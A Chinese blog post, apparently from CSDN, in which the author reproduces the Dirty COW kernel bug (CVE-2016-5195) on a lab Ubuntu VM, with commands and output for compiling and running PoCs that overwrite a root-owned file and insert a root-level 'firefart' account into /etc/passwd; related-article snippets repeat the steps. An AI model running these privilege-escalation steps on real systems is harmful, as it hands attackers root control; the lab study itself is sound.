复现dirtycow——CVE-2016-5195

最新推荐文章于 2024-06-18 14:20:54 发布
最新推荐文章于 2024-06-18 14:20:54 发布
阅读量2.1k 收藏
点赞数
分类专栏: 安全 Linux-Unix 文章标签: ubuntu linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/61208447
版权

又来复习了一下dirtycow,于是从我的U盘里载入了一个新的ubuntu-14.04-server,我想一定不要upgrade,不然就没有漏洞环境了。
然后我把ubuntu-14.04-server装好在我Mac里的VMWare之后,由于想要得到PoC的可执行文件,必须先用gcc对其进行编译,然而默认ubuntu最开始是没有gcc的,而且我想sudo apt-get install gcc也发现找不到包,,我突然蒙逼了。。。。然后最后网上搜答案才发现自己忘记sudo apt-get update了,导致出现了找不到gcc的错误(然后我不update,依然可以install vim…)。
复现过程如下:

cqq@ubuntu:~/repos/dirtycow$ ls
info.txt  pokemon.c
cqq@ubuntu:~/repos/dirtycow$ gcc -pthread pokemon.c -o pokemon
cqq@ubuntu:~/repos/dirtycow$ ls
info.txt  pokemon  pokemon.c
cqq@ubuntu:~/repos/dirtycow$ ls -al info.txt
ls: 初始化月份字符串出错
-rw-r--r-- 1 root root 9  3�� 10 20:45 info.txt
cqq@ubuntu:~/repos/dirtycow$ cat info.txt
i_am_cqq
cqq@ubuntu:~/repos/dirtycow$ ./pokemon info.txt you_are_hacked
info.txt
   (___)
   (o o)_____/
    @@ `     \
     \ ____, /you_are_hacked
     //    //
    ^^    ^^
mmap 7f4f276dd000

madvise 0

ptrace 0

cqq@ubuntu:~/repos/dirtycow$ cat info.txt
you_are_hcqq@ubuntu:~/repos/dirtycow$
cqq@ubuntu:~/repos/dirtycow$

据说加入-pthread选项是为了

可见编译选项中指定 -pthread 会附加一个宏定义 -D_REENTRANT ,该宏会导致 libc 头文件选择那些thread-safe的实现

原来是这样
http://chaoslawful.iteye.com/blog/568602

然后,当我sudo apt-get dist-upgrade之后,再运行PoC(这个PoC是可以直接修改root密码的!!!),则当前ssh连接断开!!!

cqq@ubuntu:~$ vi /etc/passwd
cqq@ubuntu:~$ cd ~/repos/dirty
cqq@ubuntu:~/repos/dirty$ ./dirty mypasswd
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: mypasswd
Complete line:
firefart:fii1PApS9Jm5Y:0:0:pwned:/root:/bin/bash

mmap: 7f2c458dc000
packet_write_wait: Connection to 192.168.170.164 port 22: Broken pipe
➜  ~

算了,下次再弄一个新的ubuntu来测试吧。先看看struts2的漏洞。

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
脏牛Linux本地提权漏洞复现(CVE-2016-5195Linux、Android、提权)
墨痕诉清风的博客
02-25 897
该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。2.将exp一下载到本地,使用gcc -pthread dirty.c -o dirty -lcrypt。命令查看linux内核信息,发现在脏牛漏洞范围内,可以进行测试。命令对dirty.c进行编译,生成一个dirty的可执行文件。假设一开始获得的是普通用户bee的权限。命令,即可进行提权。
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
[CVE-2016-5195]linux脏牛提权复现
https://www.cnblogs.com/zpchcbd/
08-21 461
1、复制源代码dirty.c到可读写目录-------》 /tmp/dirty.c 2、进行gcc编译-----------------------》gcc -pthread dirty.c -o dirty -lcrypt 3、运行编译好的文件-------------------》./dirty 你设置的密码 4、如果一直卡住的话尝试反弹shell 在交互式中进行 ...
常见逻辑漏洞复现合集(下)
最新发布
Y_main的博客
06-18 648
测试漏洞:越权访问漏洞(Insecure Direct Object References,IDOR)指的是应用程序在验证用户对资源或功能的访问权限时出现的漏洞。具体来说,这种漏洞允许攻击者直接访问应用程序中的对象(例如文件、数据库记录、URL等),而无需经过适当的身份验证或授权检查。越权漏洞一般又分为垂直越权漏洞和水平越权漏洞。本文中的漏洞为水平越权漏洞。水平越权是指攻击者通过利用系统或应用程序中的逻辑错误,以获取其他用户相同权限级别下的资源或执行操作的漏洞。
Linux内核通杀提权漏洞(CVE-2016-5195脏牛漏洞), 临时解决办法
wwwwestcn的博客
03-21 750
经过核实测试,西部数码云主机centos 7系统受次漏洞影响(centos6并不受影响),特此发布漏洞解办法。之前Linux官方爆出了"脏牛"漏洞(代号:Dirty COW,漏洞编号:CVE-2016-5195),echo "/usr/bin/staprun -L 文件路径" >> /etc/rc.local。/usr/bin/staprun -L 文件路径。2. 如果您的主机内核是此版本,请执行以下操作。1. 登录服务器,查看内核版本。3. 非此本内核,请手动编译。返回信息如下,说明补丁成功。
MacDirtyCowDemo
gitblog_00009的博客
03-05 313
MacDirtyCowDemo MacDirtyCowDemo 是一个开源的 macOS 应用程序,它演示了 Dirty COW 漏洞的工作原理,并提供了一个简单的方法在 macOS 上利用该漏洞。 项目功能及用途 MacDirtyCowDemo 可以让你在 macOS 上轻松地利用 Dirty COW 漏洞。这个漏洞是一个著名的 Linux 内核提权漏洞,在 2016 年被发现并公开披露。虽然主...
Redis 未授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 1900
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
CVE-2016-5195:CVE-2016-5195漏洞利用示例
05-10
dcow是漏洞CVE-2016-5195的可能利用。 在易受攻击的系统上以无特权的用户身份运行该程序,它将修改/ etc / passwd文件,并强制输入密码“ dirtyCowFun”(SHA-512,但可以针对较旧的标准进行修改)。 如果成功执行...
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4524
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
探索MacDirtyCowDemo:一个安全研究的实战示例
gitblog_00016的博客
04-27 321
探索MacDirtyCowDemo:一个安全研究的实战示例 项目地址:https://gitcode.com/zhuowei/MacDirtyCowDemo MacDirtyCowDemo 是一个开源项目,由知名开发者 Zhuowei 创建,旨在展示 Linux 内核漏洞 "Dirty COW"(允许提升普通用户权限至 root)在 macOS 环境中的利用方式。该项目不仅提供...
永恒之蓝 MS17-010 漏洞复现
Nobug_的博客
06-16 846
永恒之蓝 MS17-010 漏洞复现 文章目录永恒之蓝 MS17-010 漏洞复现前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.
漏洞复现
qq_44813849的博客
07-19 5670
CMS漏洞复现 CMS是"Content Management System"的缩写,意为"内容管理系统"。 网站的开发者为了方便,制作了不同种类的CMS,可以加快网站开发的速度和减少开发的成本。 常见cms 环境搭建 CMS官网CMS 网站源码下载源码 下载好后放到本地WWW目录下,然后开启PHPstudy,在浏览器访问 点击我已阅读并继续。然后是环境检测,保存默认即可 接下来是参数配置,需要设...
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 5865
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
漏洞复现
热门推荐
good good study
03-03 1万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞(CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞(CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍
复现CVE-2016-3088
10-15
好的,CVE-2016-3088是一个Apache Struts2框架的漏洞,攻击者可以通过构造恶意请求来执行任意代码。要复现该漏洞,可以按照以下步骤进行: 1. 下载Apache Struts2框架,并解压缩。 2. 在解压后的目录中,找到struts...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值